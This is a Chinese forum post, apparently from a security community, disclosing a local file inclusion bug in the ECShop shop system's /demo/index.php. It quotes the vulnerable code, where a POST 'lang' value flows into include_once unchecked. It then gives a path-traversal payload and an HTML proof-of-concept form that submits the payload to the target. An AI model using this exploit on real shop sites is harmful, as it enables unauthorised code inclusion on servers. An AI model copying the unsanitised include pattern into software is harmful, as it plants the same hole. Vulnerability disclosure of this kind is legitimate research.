ECShop网店系统最新版本地包含漏洞

90_

这个洞，其实我在2012年1月的时候看ecshop就分析出来过，当初由于感觉鸡肋就没怎么放出来。刚下了个官网最新版的，没想到还存在。
漏洞文件在：/demo/index.php

1. 
   
2. if (!empty($_POST['lang'])) //如果不为空
   
3. {
   
4. $lang_charset = explode('_', $_POST['lang']); //_分割
   
5. $updater_lang = $lang_charset[0].'_'.$lang_charset[1];
   
6. $ec_charset = $lang_charset[2]; //我们要控制的。
   
7. }
   
8. .
   
9. .
   
10. .
    
11. /* 加载升级程序所使用的语言包 */
    
12. $updater_lang_package_path = ROOT_PATH . 'demo/languages/' . $updater_lang . '_' . $ec_charset .'.php'; //成功进行控制
    
13. if (file_exists($updater_lang_package_path))
    
14. {
    
15. include_once($updater_lang_package_path); //存在就包含。
    
16. $smarty->assign('lang', $_LANG);
    
17. }
    
18. else
    
19. {
    
20. die('Can\'t find language package!');
    
21. }

复制代码

为了方便测试，我在本地网站根目录下建立一个1.php
代码如下：

1. 
   
2. <?php
   
3. Phpinfo();
   
4. ?>

复制代码

然后利用如下：
POST提交

1. lang=123_123_1/../../../1

复制代码

成功包含 根目录下1.php

由于本机，搭建环境出了个问题，这个是借别人的图。。应该为post提交，这个漏洞鸡肋之处在于，魔术引号，后面貌似不能%00。
利用代码。保存为html。

1. 
   
2. <font face="宋体 "><code id="code2"> <html>
   
3. <body>
   
4. <form action="http://127.0.0.1/demo/index.php" method="post"
   
5. enctype="multipart/form-data">
   
6. <input type="text" name="lang" />
   
7. <input type="submit" name="submit" value="Submit" />
   
8. </form>
   
9. </body>
   
10. </html></code></font>

复制代码

作者：风之传说 》》90sec

Diana

分析的精明 学习了